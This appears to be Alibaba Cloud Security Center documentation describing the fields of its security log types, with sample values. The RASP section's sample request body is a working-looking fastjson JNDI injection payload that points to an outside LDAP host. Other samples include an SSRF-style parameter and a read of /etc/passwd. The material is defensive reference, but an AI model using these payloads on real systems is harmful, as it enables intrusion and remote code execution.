Security Center:Log types and log fields of the V1.0 log dictionaries

Field name

Description

Example

content_length

The length of the message body. Unit: bytes.

612

dst_ip

The IP address of the destination host.

39.105.XX.XX

dst_port

The port of the destination host.

80

host

The IP address or domain name of the destination host.

39.105.XX.XX

jump_location

The redirection address.

123

method

The HTTP request method.

GET

referer

The HTTP referer. The field contains the URL of the web page that is linked to the resource being requested.

www.example.com

request_datetime

The time when the request is initiated.

2023-08-07 22:42:41

ret_code

The HTTP status code.

200

rqs_content_type

The type of the request content.

text/plain;charset=utf-8

rsp_content_type

The type of the response content.

text/plain; charset=utf-8

src_ip

The source IP address.

31.220.XX.XX

src_port

The source port.

59524

uri

The request URI.

/report

user_agent

The user agent that initiates the request.

okhttp/3.2.0

x_forward_for

The HTTP request header that records the originating IP address of the client.

31.220.XX.XX

Field name

Description

Example

additional

The additional field that is returned by the DNS server and records information such as the CNAME record, MX record, and PTR record.

N/A

additional_num

The number of additional records returned by the DNS server.

0

answer

The DNS answer returned by the DNS server, which indicates the resolution results. A DNS answer contains the IP address to which the requested domain name is resolved or other information such as the A record and the AAAA record.

example.com A IN 52 1.2.XX.XX

answer_num

The number of DNS answers.

1

authority

The authority field returned by the DNS server. An authority is the DNS server that manages and resolves the domain name. An authority field contains information about a DNS server that provides the DNS record for the requested domain name, such as the NS record.

NS IN 17597

authority_num

The number of authorities.

1

client_subnet

The subnet of the client.

59.152.XX.XX

dst_ip

The destination IP address.

106.55.XX.XX

dst_port

The destination port.

53

in_out

The direction of data transmission. Valid values:

• in: request to the DNS server

• out: response from the DNS server

out

qid

The ID of the query.

13551

qname

The domain name that is queried.

example.com

qtype

The type of the query.

A

query_datetime

The time of the query.

2023-08-25 09:59:15

rcode

The response code returned by the DNS server, which indicates the DNS resolution result.

0

region

The ID of the source region. Valid values:

• 1: China (Beijing)

• 2: China (Qingdao)

• 3: China (Hangzhou)

• 4: China (Shanghai)

• 5: China (Shenzhen)

• 6: other regions

1

response_datetime

The response time of the DNS server.

2023-08-25 09:59:16

src_ip

The source IP address.

106.11.XX.XX

src_port

The source port.

22

Field name

Description

Example

answer_rda

The resource data area (RDA) field of the DNS answer, which indicates the specific value of the resolution result.

106.11.XX.XX

answer_ttl

The time to live (TTL) of the DNS answer. Unit: seconds.

600

answer_type

The type of the DNS answer. Valid values:

• 1: A record

• 2: NS record

• 5: CNAME record

• 6: SOA record

• 10: NULL record

• 12: PTR record

• 15: MX record

• 16: TXT record

• 25: KEY record

• 28: AAAA record

• 33: SRV record

• 41: OPT record

• 43: DS record

• 44: SSHFP record

• 45: IPSECKEY record

• 46: RRSIG record

• 47: NSEC record

1

anwser_name

The name of the DNS answer, which indicates the domain name associated with the resource record.

example.com

dest_ip

The destination IP address. The value is a decimal IP address by default.

323223****

dest_port

The destination port.

53

group_id

The group ID. The same group ID indicates the same DNS request or response.

3

hostname

The name of the host.

hostname

id

The ID of the query, which identifies a DNS request or DNS response.

64588

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address that is included in the DNS request or response.

121.40.XX.XX

ip_ttl

The TTL of the IP packet in the DNS request or response.

64

query_name

The domain name that is queried.

example.com

query_type

The type of the query. Valid values:

• 1: A record

• 2: NS record

• 5: CNAME record

• 6: SOA record

• 10: NULL record

• 12: PTR record

• 15: MX record

• 16: TXT record

• 25: KEY record

• 28: AAAA record

• 33: SRV record

1

src_ip

The IP address from which the DNS request or response is initiated. The value is a decimal IP address by default.

168427****

src_port

The number of the port from which the DNS request or response is initiated.

53

time

The timestamp of the DNS request or response. Unit: seconds.

1537840756

time_usecond

The timestamp of the DNS request or response. Unit: microseconds.

49069

tunnel_id

The ID of the tunnel used by the DNS request or response. Tunneling is a way to transfer data by using different protocols. Tunneling can be used for secure access to the Internet or for communications across different networks.

514763

Field name

Description

Example

asset_type

The type of the asset from which the logs are collected. Valid values:

• ECS: Elastic Compute Service (ECS) instance

• SLB: Server Load Balancer (SLB) instance

• NAT: NAT Gateway

ECS

dst_ip

The destination IP address.

119.96.XX.XX

dst_port

The destination port.

443

in_out

The direction of the session. The value is fixed as out.

• If the value of the proto field is tcp, the value of this field indicates an outbound request.

• If the value of the proto field is udp, the value of this field does not indicate the direction of the request and is for reference only.

out

proto

The type of the protocol. Valid values:

• tcp

• udp

tcp

session_time

The time when the session starts.

2023-08-15 09:59:49

src_ip

The source IP address.

121.40.XX.XX

src_port

The source port.

53602

Field name

Description

Example

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server.

192.168.XX.XX

sas_group_name

The asset group to which the server belongs in Security Center.

default

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

warn_ip

The IP address that is used to log on to the server.

221.11.XX.XX

warn_port

The port that is used to log on to the server.

22

warn_type

The logon type. Valid values:

• SSHLOGIN and SSH: SSH logon

• RDPLOGIN: remote desktop logon

• IPCLOGIN: IPC connection logon

SSH

warn_user

The username that is used for logon.

admin

warn_count

The number of logon attempts.

The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the warn_count field is 3, three logon attempts were made within 1 minute.

3

Field name

Description

Example

cmd_chain

The process chain.

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

The index of the process chain. You can use an index to search for a process chain.

B184

container_hostname

The name of the server in the container.

nginx-ingress-controller-765f67fd4d-****

container_id

The container ID.

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

The image ID.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

The image name.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

The container name.

nginx-ingress-****

container_pid

The ID of the process in the container.

0

dir

The direction of the network connection. Valid values:

• in

• out

in

dst_ip

The destination IP address.

• If the value of dir is out, the value of this field is the IP address of the peer host.

• If the value of dir is in, the value of this field is the IP address of your host.

192.168.XX.XX

dst_port

The destination port.

443

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server.

192.168.XX.XX

parent_proc_file_name

The name of the parent process file.

/usr/bin/bash

pid

The ID of the process.

14275

ppid

The parent process ID.

14268

proc_name

The name of the process.

nginx

proc_path

The path to the process.

/usr/local/nginx/sbin/nginx

proc_start_time

The time when the process was started.

N/A

proto

The protocol. Valid values:

• tcp

• udp

• raw, which indicates raw socket

tcp

sas_group_name

The asset group to which the server belongs in Security Center.

default

src_ip

The source IP address.

100.127.XX.XX

src_port

The source port.

41897

srv_comm

The command name associated with the parent process of the parent process.

containerd-shim

status

The status of the network connection. Valid values:

• 1: The connection is closed.

• 2: The connection is to be established.

• 3: The SYN packet is sent.

• 4: The SYN packet is received.

• 5: The connection is established.

• 6: The connection is waiting to be closed.

• 7: The connection is being closed.

• 8: The local endpoint is waiting for an acknowledgment of the connection termination request from the peer endpoint.

• 9: The local endpoint is waiting for a connection termination request from the peer endpoint after it has received the acknowledgement from the peer endpoint.

• 10: The local endpoint is waiting for enough time to elapse to ensure that the peer endpoint receives the acknowledgment from the local endpoint.

• 11: The transmission control block (TCB) for the connection is deleted.

5

type

The type of the real-time network connection. Valid values:

• connect: TCP connection initiated

• accept: TCP connection received

• listen: port listening

listen

uid

The ID of the user who started the process.

101

username

The name of the user who started the process.

root

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

Field name

Description

Example

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server that is under a brute-force attack.

192.168.XX.XX

sas_group_name

The asset group to which the server belongs in Security Center.

default

uuid

The UUID of the server that is under a brute-force attack.

5d83b26b-b7ca-4a0a-9267-12*****

warn_count

The number of failed logon attempts.

The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the warn_count field is 3, three logon attempts were made within 1 minute.

3

warn_ip

The source IP address.

47.92.XX.XX

warn_port

The logon port.

22

warn_type

The logon type. Valid values:

• SSHLOGIN and SSH: SSH logon

• RDPLOGIN: remote desktop logon

• IPCLOGIN: IPC connection logon

SSH

warn_user

The username that is used for logon.

user

Field name

Description

Example

account_expire

The date when the account expires. The value never indicates that the account never expires.

never

domain

The domain or directory to which the account belongs. The value N/A indicates that the account does not belong to a domain.

N/A

groups

The group to which the account belongs. The value N/A indicates that the account does not belong to a group.

["nscd"]

home_dir

The home directory, which is the default directory to store and manage files in the system.

/Users/abc

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server.

192.168.XX.XX

last_chg

The date when the password was last changed.

2022-11-29

last_logon

The date and time of the last logon that is initiated by using the account. The value N/A indicates that the account has not been used for logons.

2023-08-18 09:21:21

login_ip

The IP address from which the last remote logon was initiated by using the account. The value N/A indicates that the account has not been used for logons.

192.168.XX.XX

passwd_expire

The date when the password expires. The value never indicates that the password never expires.

2024-08-24

perm

Indicates whether the account has root permissions. Valid values:

• 0: no

• 1: yes

0

sas_group_name

The asset group to which the server belongs in Security Center.

default

shell

The Linux shell command.

/sbin/nologin

status

The status of the account. Valid values:

• 0: Logons from the account are not allowed.

• 1: Logons from the account are allowed.

0

tty

The terminal that is logged on to. The value N/A indicates that the account has not been used for terminal logons.

N/A

user

The name of the user.

nscd

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

warn_time

The date when you are notified of expiring passwords. The value never indicates that no notifications are sent.

2024-08-20

Field name

Description

Example

dir

The direction of the network connection. Valid values:

• in

• out

in

dst_ip

The destination IP address.

• If the value of dir is out, the value of this field is the IP address of the peer host.

• If the value of dir is in, the value of this field is the IP address of your host.

192.168.XX.XX

dst_port

The destination port.

443

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server.

192.168.XX.XX

pid

The ID of the process.

682

proc_name

The name of the process.

sshd

proto

The protocol. Valid values:

• tcp4: TCP connections over IPv4 addresses

• tcp6: TCP connections over IPv6 addresses

• udp4: UDP connections over IPv4 addresses

• udp6: UDP connections over IPv6 addresses

tcp4

sas_group_name

The asset group to which the server belongs in Security Center.

default

src_ip

The source IP address.

100.127.XX.XX

src_port

The source port.

41897

status

The status of the network connection. Valid values:

• 1: The connection is closed.

• 2: The connection is to be established.

• 3: The SYN packet is sent.

• 4: The SYN packet is received.

• 5: The connection is established.

• 6: The connection is waiting to be closed.

• 7: The connection is being closed.

• 8: The local endpoint is waiting for an acknowledgment of the connection termination request from the peer endpoint.

• 9: The local endpoint is waiting for a connection termination request from the peer endpoint after it has received the acknowledgement from the peer endpoint.

• 10: The local endpoint is waiting for enough time to elapse to ensure that the peer endpoint receives the acknowledgment from the local endpoint.

• 11: The TCB for the connection is deleted.

5

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

Field name

Description

Example

cmdline

The complete command to start the process.

/usr/local/share/assist-daemon/assist_daemon

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server.

192.168.XX.XX

md5

The MD5 hash value of the binary file.

1086e731640751c9802c19a7f53a64f5

name

The name of the process file.

assist_daemon

path

The full path to the process file.

/usr/local/share/assist-daemon/assist_daemon

pid

The ID of the process.

1692

pname

The name of the parent process file.

systemd

sas_group_name

The asset group to which the server belongs in Security Center.

default

start_time

The time when the process started. This is a built-in field.

2023-08-18 20:00:12

uid

The ID of the user who started the process.

101

username

The name of the user who started the process.

root

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

Field name

Description

Example

domain

The domain name that is included in the DNS request.

example.aliyundoc.com

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

ip

The IP address of the server that initiates the DNS request.

192.168.XX.XX

pid

The ID of the process that initiates the DNS request.

3544

ppid

The ID of the parent process that initiates the DNS request.

3408

proc_cmd_chain

The chain of the process that initiates the DNS request.

"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

proc_cmdline

The command line of the process that initiates the DNS request.

C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

The path to the process that initiates the DNS request.

C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

The asset group to which the server belongs in Security Center.

default

time

The time when the DNS request is captured. In most cases, the value is the point in time when the DNS request is initiated.

2023-08-17 20:05:04

uuid

The UUID of the server that initiates the DNS request.

5d83b26b-b7ca-4a0a-9267-12****

Field name

Description

Example

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

client_ip

The IP address of the server.

192.168.XX.XX

agent_version

The version of the Security Center agent.

aegis_11_91

last_login

The timestamp of the last logon. Unit: milliseconds.

1716444387617

platform

The type of the operating system. Valid values:

• windows

• linux

linux

region_id

The ID of the region in which the server resides.

cn-beijing

status

The status of the Security Center agent. Valid values:

• online

• offline

online

Field name

Description

Example

alias_name

The alias of the vulnerability.

CESA-2023:1335: openssl Security Update

extend_content

The extended information about the vulnerability.

{"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]}

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the host.

39.104.XX.XX

intranet_ip

The private IP address of the host.

192.168.XX.XX

machine_name

The name of the host.

hhht-linux-***

name

The name of the vulnerability.

centos:7:cesa-2023:1335

op

The operation on the vulnerability. Valid values:

• new

• verify

• fix

new

status

The status information. Valid values:

• 1: unfixed

• 2: fix failed

• 3: rollback failed

• 4: fixing

• 5: rolling back

• 6: verifying

• 7: fixed

• 8: fixed and pending restart

• 9: rolled back

• 10: ignored

• 11: rolled back and pending restart

• 12: no longer exists

• 13: expired

1

tag

The tag that is added to the vulnerability. Valid values:

• oval: Linux software vulnerability

• system: Windows system vulnerability

• cms: Web-CMS vulnerability

  Note

  A random string indicates other types of vulnerabilities.

oval

type

The type of the vulnerability. Valid values:

• sys: Windows system vulnerability

• cve: Linux software vulnerability

• cms: Web-CMS vulnerability

• emg: urgent vulnerability

sys

uuid

The UUID of the server.

ad66133a-dc82-4e5e-9659-a49e3****

Field name

Description

Example

check_item

The name of the check item.

Set the shortest interval between password changes

check_level

The risk level of the baseline. Valid values:

• high

• medium

• low

medium

check_type

The type of the check item.

Identity authentication

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

level

The severity of the risk item. Valid values:

• high

• medium

• low

medium

op

The operation. Valid values:

• new

• verity

new

risk_name

The name of the risk item.

Password compliance check

sas_group_name

The server group to which the server belongs in Security Center. The risk item is detected on the server.

default

status

The status information. Valid values:

• 1: unfixed

• 2: fix failed

• 3: rollback failed

• 4: fixing

• 5: rolling back

• 6: verifying

• 7: fixed

• 8: fixed and pending restart

• 9: rolled back

• 10: ignored

• 11: rolled back and pending restart

• 12: no longer exists

• 13: expired

1

sub_type_alias

The alias of the subtype in Chinese.

Internationally Agreed Best Practices for Security - Ubuntu 16/18/20/22 Security Baseline Check

sub_type_name

The name of the subtype. For more information about baseline subtypes, see Baseline types and subtypes.

hc_ubuntu16_cis_rules

type_alias

The alias of the check type in Chinese.

Internationally Agreed Best Practices for Security

type_name

The type of the baseline. For more information about baseline types, see Baseline types and subtypes.

cis

uuid

The UUID of the server on which the risk item is detected.

1ad66133a-dc82-4e5e-9659-a49e3****

Field name

Description

Example

data_source

The data source. Valid values:

• aegis_suspicious_event: host exceptions

• aegis_suspicious_file_v2: webshells

• aegis_login_log: unusual logons

• honeypot: alert events generated by cloud honeypots

• object_scan: file detection exceptions

• security_event: Security Center exceptions

• sas_ak_leak: AccessKey pair leaks

aegis_login_log

detail

The details of the alert.

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Log on to an ECS instance by using an unusual account","status":0}

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the host.

39.104.XX.XX

intranet_ip

The private IP address of the host.

192.168.XX.XX

level

The risk level of the alert. Valid values:

• serious

• suspicious

• remind

suspicious

name

The name of the alert.

Unusual logon - Logon to an ECS instance by using an unusual account

op

The operation. Valid values:

• new

• dealing

• update

new

status

The status of the alert. Valid values:

• 0: all

• 1: pending handling

• 2: ignored

• 4: confirmed

• 8: marked as a false positive

• 16: being handled

• 32: handled

• 64: expired

• 128: deleted

• 512: being automatically blocked

• 513: automatically blocked

1

unique_info

The UUID of the alert.

2536dd765f804916a1fa3b9516b5****

uuid

The UUID of the server on which the alert is generated.

ad66133a-dc82-4e5e-9659-a49e3****

Field name

Description

Example

check_id

The ID of the check item. You can call the ListCheckResult operation to query the IDs of check items. The operation is used to query the details of the risk items that are detected in the configuration checks on cloud services.

11

check_show_name

The name of the check item.

Back-to-origin settings

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

instance_name

The name of the instance.

lsm

instance_result

The impacts of risks. The value is a JSON string.

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]}

instance_sub_type

The subtype of the instance. Valid values:

• If the type of the instance is ECS, the following valid values are supported:

  • INSTANCE

  • DISK

  • SECURITY_GROUP

• If the type of the instance is Container Registry, the following valid values are supported:

  • REPOSITORY_ENTERPRISE

  • REPOSITORY_PERSON

• If the type of the instance is Resource Access Management (RAM), the following valid values are supported:

  • ALIAS

  • USER

  • POLICY

  • GROUP

• If the type of the instance is Web Application Firewall (WAF), the value is fixed as DOMAIN.

• If the type of the instance is other values, the value is fixed as INSTANCE.

INSTANCE

instance_type

The type of the instance. Valid values:

• ECS

• SLB

• RDS: ApsaraDB RDS

• MONGODB: ApsaraDB for MongoDB

• KVSTORE: ApsaraDB for Redis

• ACR: Container Registry

• CSK: Container Service for Kubernetes (ACK)

• VPC: Virtual Private Cloud (VPC)

• ACTIONTRAIL: ActionTrail

• CDN: Alibaba Cloud CDN (CDN)

• CAS: Certificate Management Service (formerly SSL Certificates Service)

• RDC: Apsara Devops

• RAM

• DDOS: Anti-DDoS

• WAF

• OSS

• POLARDB: PolarDB

• POSTGRESQL: ApsaraDB RDS for PostgreSQL

• MSE: Microservices Engine (MSE)

• NAS: File Storage NAS (NAS)

• SDDP: Sensitive Data Discovery and Protection (SDDP)

• EIP: Elastic IP Address (EIP)

ECS

region_id

The region ID of the instance.

cn-hangzhou

requirement_id

The requirement item ID. You can call the ListCheckStandard operation to query the IDs of requirement items. The operation is used to query the standards of configuration checks.

5

risk_level

The risk level. Valid values:

• LOW

• MEDIUM

• HIGH

MEDIUM

section_id

The section ID. You can call the ListCheckResult operation to query section IDs. The operation is used to query the details of the risk items that are detected in the configuration checks on cloud services.

1

standard_id

The standard ID. You can call the ListCheckStandard operation to query standard IDs. The operation is used to query the standards of configuration checks.

1

status

The status of the check item. Valid values:

• NOT_CHECK: The check item is not checked.

• CHECKING: The check item is being checked.

• PASS: The check item passed the check.

• NOT_PASS: The check item failed the check.

• WHITELIST: The check item is added to the whitelist.

PASS

vendor

The cloud service provider. The value is fixed as ALIYUN.

ALIYUN

Field name

Description

Example

cmd

The command line of the attacked process.

nginx: master process nginx

cur_time

The time when the attack event occurred.

2023-09-14 09:21:59

decode_payload

The decoded hexadecimal payload.

POST /Services/FileService/UserFiles/

dest_ip

The IP address of the attacked asset.

172.16.XX.XX

dest_port

The port of the attacked asset.

80

func

The type of the blocked event. Valid values:

• payload: indicates that an event is blocked when malicious data or instructions are detected.

• tuple: indicates that an event is blocked when malicious IP addresses are detected.

payload

rule_type

The type of the rule that is used in the blocked event. Valid values:

• alinet_payload: indicates a payload defense rule that is specified in Security Center.

• alinet_tuple: indicates a tuple defense rule that is specified in Security Center.

alinet_payload

instance_id

The instance ID of the attacked asset.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the attacked asset.

39.104.XX.XX

intranet_ip

The private IP address of the attacked asset.

192.168.XX.XX

model

The defense action. The value is fixed as block. The value indicates that the attack is blocked.

block

payload

The hexadecimal payload.

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

The ID of the attacked process.

7107

platform

The type of the operating system of the attacked asset. Valid values:

• win

• linux

linux

proc_path

The path to the attacked process.

/usr/sbin/nginx

sas_group_name

The asset group to which the server belongs in Security Center.

default

src_ip

The source IP address of the attack.

106.11.XX.XX

src_port

The source port of the attack.

29575

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

Field name

Description

Example

app_dir

The directory in which the application is stored.

/usr/local/aegis/rasp/apps/1111

app_id

The ID of the application.

6492a391fc9b4e2aad94****

app_name

The name of the application.

test

confidence

The confidence level of the detection algorithm. Valid values:

• high

• medium

• low

low

content

The information about the request body.

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

content_length

The length of the request body.

112

data

The hook.

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

The information about the request header.

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"}

hostname

The name of the host or network device.

testhostname

ip

The private IP address of the host.

172.16.XX.XX

is_cliped

Indicates whether the log is truncated due to an excessive length. Valid values:

• true

• false

false

jdk

The JDK version.

1.8.0_292

message

The description of the alert.

Unsafe class serial.

method

The method of the request.

Post

os

The type of the operating system.

Linux

os_arch

The architecture of the operating system.

amd64

os_version

The kernel version of the operating system.

3.10.0-1160.59.1.el7.x86_64

param

The request parameter. In most cases, the parameter is in one of the following formats:

• GET parameter

• application/x-www-form-urlencoded

{"url":["http://127.0.0.1.xip.io"]}

payload

The attack payload.

bash -c kill -0 -- -'31098'

payload_length

The length of the attack payload.

27

rasp_id

The ID of the Runtime Application Self Protection (RASP) agent.

fa00223c8420e256c0c98ca0bd0d****

rasp_version

The version of the RASP agent.

0.4.3

remote

The IP address from which the request is initiated.

172.0.XX.XX

result

The handling result of the alert. Valid values:

• block

• monitor

block

rule_result

The alert handling action that is specified in the application protection rule. Valid values:

• block

• monitor

block

severity

The risk level. Valid values:

• high

• medium

• low

high

stacktrace

The stack information.

[java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......]

time

The time when the alert was generated.

2023-10-09 15:19:15

timestamp

The timestamp when the alert was generated. Unit: milliseconds.

1696835955070

type

The type of the vulnerability. Valid values:

• attach: malicious Attach API

• beans: malicious beans binding

• classloader: malicious class loading

• dangerous_protocol: usage of vulnerable protocols

• dns: malicious DNS query

• engine: engine injection

• expression: expression injection

• file: malicious file read and write

• file_delete: arbitrary file deletion

• file_list: directory traversal

• file_read: arbitrary file read

• file_upload: malicious file upload

• jndi: Java Naming and Directory Interface (JNDI) injection

• jni: Java Native Interface (JNI) injection

• jstl: JavaServer Pages Standard Tag Library (JSTL) arbitrary file inclusion

• memory_shell: in-memory webshell injection

• rce: command execution

• read_object: deserialization attack

• reflect: malicious reflection call

• sql: SQL injection

• ssrf: malicious external connection

• thread_inject: thread injection

• xxe: XML external entity (XXE) attack

rce

url

The request URL.

http://127.0.0.1:999/xxx

rasp_attack_uuid

The UUID of the vulnerability.

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

The UUID of the host.

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

The public IP address of the host.

1.2.XX.XX

intranet_ip

The private IP address of the host.

172.16.XX.XX

sas_group_name

The group to which the server belongs in Security Center.

Group 1

instance_id

The instance ID of the host.

i-wz995eivg28f1m**

Field name

Description

Example

bucket_name

The name of the bucket.

***-test

event_id

The ID of the alert.

802210

event_name

The name of the alert.

Mining program

md5

The MD5 value of the file.

6bc2bc******53d409b1

sha256

The SHA-256 hash value of the file.

f038f9525******7772981e87f85

result

The detection result.

• 0: No malicious file is detected.

• 1: Malicious files are detected.

0

file_path

The path to the file.

test.zip/bin_test

etag

The ID of the OSS object.

6BC2B******853D409B1

risk_level

The risk level.

• serious

• suspicious

• remind

remind

source

The check method.

• OSS: Objects in OSS buckets are checked in the Security Center console.

• API: SDK for Java or Python is used to detect malicious files.

OSS

parent_md5

The MD5 hash value of the parent file or the compressed package file.

3d0f8045bb9******

parent_sha256

The SHA-256 hash value of the parent file or the compressed package file.

69b643d6******a3fb859fa

parent_file_path

The name of the parent file or the compressed package file.

test.zip

start_time

The timestamp when the detection starts. Unit: seconds.

1718678414

Field name

Description

Example

start_time

The timestamp when the event last happened. Unit: seconds.

1718678414

uuid

The UUID of the server.

5d83b26b-b**a-4**a-9267-12****

file_path

The path to the file.

/etc/passwd

proc_path

The path to the process.

/usr/bin/bash

rule_id

The ID of the hit rule.

123

rule_name

The name of the rule.

file_test_rule

cmdline

The command line.

bash /opt/a

operation

The operation that you want to perform on the file.

READ

risk_level

The risk level.

2

pid

The process ID.

45324

proc_permission

The permissions to run the process.

rwxrwxrwx

instance_id

The instance ID.

i-wz995eivg2****

internet_ip

The IP address.

192.0.2.1

intranet_ip

The private IP address.

172.16.0.1

instance_name

The instance name.

aegis-test

platform

The operating system type.

Linux